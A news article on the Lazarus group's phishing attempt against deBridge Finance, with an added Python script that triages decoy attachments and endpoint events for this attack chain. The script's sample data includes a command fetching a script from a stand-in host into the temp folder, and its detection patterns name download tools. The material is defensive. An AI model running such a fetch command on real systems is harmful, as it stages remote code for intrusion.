Lazarus Hackers Enriching North Korea
The North Korean Lazarus group has established itself as one of the most notorious hacking groups on the dark web. The Kim Jong Un-funded hackers have, no doubt, cemented their status in the hacking world over the past few years. Now they have attempted to steal cryptocurrency from their latest target, Debridge Finance, in just one of many cryptocurrency hijacking attempts the group has made this year.
Debridge Finance's lucrative model and its cross-chain design make it a prime target for the dark web hackers, since it allows the decentralized transfer of assets between blockchains.
Sources reveal that Lazarus took a creative route, targeting the entity through its own employees. With a phishing email, the hackers tried to dupe employees of the company into running malware that gathered data from Windows systems and allowed further malicious code to be delivered and executed in the later stages of the attack.
Lazarus' Cunning Trick
The email was sent en masse to employees and included an HTML file called ‘New Salary Adjustments’ disguised as a PDF file, along with a Windows shortcut file (.LNK) pretending to be a plain text file containing a user password. According to the email’s details, the update purportedly came from the company’s co-founder, Alex Smirnov.
According to Smirnov’s Twitter statements, released shortly after the attack, the LNK file automatically runs Command Prompt with a specific set of commands that retrieve a payload from a remote location. Clicking the fake PDF, meanwhile, takes the victim to a cloud storage location that claims to provide a password-protected archive containing the PDF, which prompts the victim to open the fake text file to obtain the password.
Salary Increase Malware
The script was written to display a Notepad message with the text “pdf password: salary2022” and to determine whether the compromised system is protected by a Tencent, Bitdefender, or ESET security solution.
If the processes for those security products were not present, the script would copy itself into the Startup folder to ensure persistence. This allows the malware to survive reboots and request further instructions directly from the hackers’ command server.
At this point the attacker receives information about the compromised system: the operating system, network adapters, the victim’s username, CPU, and the list of running processes.
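The chain described above leaves several observable traces: a decoy attachment with a document extension in front of an executable one, a shell spawned from Explorer (a double-clicked shortcut) that fetches something over the network, and a script host writing into the Startup folder. The triage script below is an added example, not code from the article or from deBridge; the attachment names, events and paths are constructed samples in a Sysmon-like shape.

```python
import re

# Constructed sample telemetry (not from the article): attachment names from a
# mail gateway and process/file events as a Sysmon-style collector would emit.
ATTACHMENTS = ["New Salary Adjustments.pdf.html", "password.txt.lnk", "report.pdf"]
EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c curl http://example.invalid/x -o %TEMP%\\x.js"},
    {"type": "file", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.js"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

DECOY_EXTS = {".pdf", ".txt", ".doc", ".docx", ".xls", ".xlsx"}
EXEC_EXTS = {".lnk", ".html", ".hta", ".js", ".vbs", ".exe", ".scr"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
NET_HINT = re.compile(r"https?://|\b(curl|certutil|bitsadmin|downloadstring|invoke-webrequest)\b", re.I)
STARTUP = re.compile(r"\\start menu\\programs\\startup\\", re.I)

def disguised_attachment(name):
    """True for 'file.pdf.html'-style names: a decoy document extension in front of an executable one."""
    parts = name.lower().rsplit(".", 2)
    return len(parts) == 3 and f".{parts[1]}" in DECOY_EXTS and f".{parts[2]}" in EXEC_EXTS

def flag_event(ev):
    """Return a finding for a suspicious event, or None for benign activity."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    if ev["type"] == "process" and image in SHELLS:
        # A shortcut double-clicked in Explorer shows up as explorer.exe -> shell.
        if ev["parent"].lower().endswith("explorer.exe") and NET_HINT.search(ev["cmdline"]):
            return f"shell spawned from Explorer with network fetch: {ev['cmdline']}"
    if ev["type"] == "file" and image in SHELLS and STARTUP.search(ev["target"]):
        return f"script host wrote to Startup folder: {ev['target']}"
    return None

def triage(attachments, events):
    """Collect findings from attachment names and endpoint events."""
    findings = [f"disguised attachment: {a}" for a in attachments if disguised_attachment(a)]
    findings += [f for f in map(flag_event, events) if f]
    return findings

if __name__ == "__main__":
    for finding in triage(ATTACHMENTS, EVENTS):
        print(finding)
```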
According to Smirnov, only a few antivirus programs detected the malware used in the Lazarus hacking scheme.
Despite the email being sent to many employees, most of them reported it as suspicious. Only one employee fell for the trap, downloading and opening the documents. This is what allowed Smirnov to analyze the attack before Lazarus could add another multi-million-dollar heist to its growing list of international cryptocurrency hijackings.